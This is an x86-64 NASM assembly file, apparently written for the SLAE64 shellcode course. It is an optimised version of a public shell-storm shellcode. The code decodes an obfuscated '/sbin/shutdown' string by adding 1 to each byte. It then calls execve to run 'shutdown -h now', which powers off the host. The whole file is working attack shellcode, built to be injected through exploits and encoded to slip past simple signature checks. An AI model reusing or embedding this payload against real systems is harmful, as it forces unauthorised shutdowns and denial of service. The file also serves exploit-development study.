72 lines
No EOL
1.6 KiB
NASM
72 lines
No EOL
1.6 KiB
NASM
; ===================================================================
|
|
; Optimized version of shellcode at:
|
|
; http://shell-storm.org/shellcode/files/shellcode-877.php
|
|
; Author: SLAE64-1351 (Keyman)
|
|
; Date: 14/09/2014
|
|
;
|
|
; Length: 64 bytes (got shorter by 1 byte :D )
|
|
;
|
|
; What's new is that some optimalization was performed on the
|
|
; original code which left some space to do a basic decoding of the
|
|
; command (/sbin/shutdown). Each byte (except the first one) was
|
|
; decremented by 1. The decoder just adds 1 to each byte.
|
|
;
|
|
; ===================================================================
|
|
|
|
section .text
|
|
global _start
|
|
|
|
_start:
|
|
|
|
xor rax, rax ; clear rax and rdx
|
|
cdq
|
|
|
|
; -------------------------------------------------------------------
|
|
; 1. store '-h' on stack
|
|
; -------------------------------------------------------------------
|
|
|
|
push rax
|
|
push word 0x682d ;-h
|
|
push rsp
|
|
pop rcx
|
|
|
|
; -------------------------------------------------------------------
|
|
; 2. store 'now' on stack
|
|
; -------------------------------------------------------------------
|
|
|
|
push rax
|
|
push byte 0x77
|
|
push word 0x6f6e ; now
|
|
push rsp
|
|
pop rbx
|
|
|
|
push rax
|
|
push rbx
|
|
push rcx
|
|
|
|
; -------------------------------------------------------------------
|
|
; 3. store '/sbin/shutdown' on stack
|
|
; -------------------------------------------------------------------
|
|
|
|
push rsp
|
|
pop rsi
|
|
|
|
push rax
|
|
jmp shutdown
|
|
cont:
|
|
pop rdi
|
|
|
|
push 15
|
|
pop rcx
|
|
|
|
do_add:
|
|
add byte [rdi+rcx], 0x01
|
|
loop do_add
|
|
|
|
push 59
|
|
pop rax
|
|
syscall
|
|
|
|
shutdown:
|
|
call cont
|
|
c_1: db 0x2f, 0x2e, 0x2e, 0x72, 0x61, 0x68, 0x6d, 0x2e, 0x72, 0x67, 0x74, 0x73, 0x63, 0x6e, 0x76, 0x6d |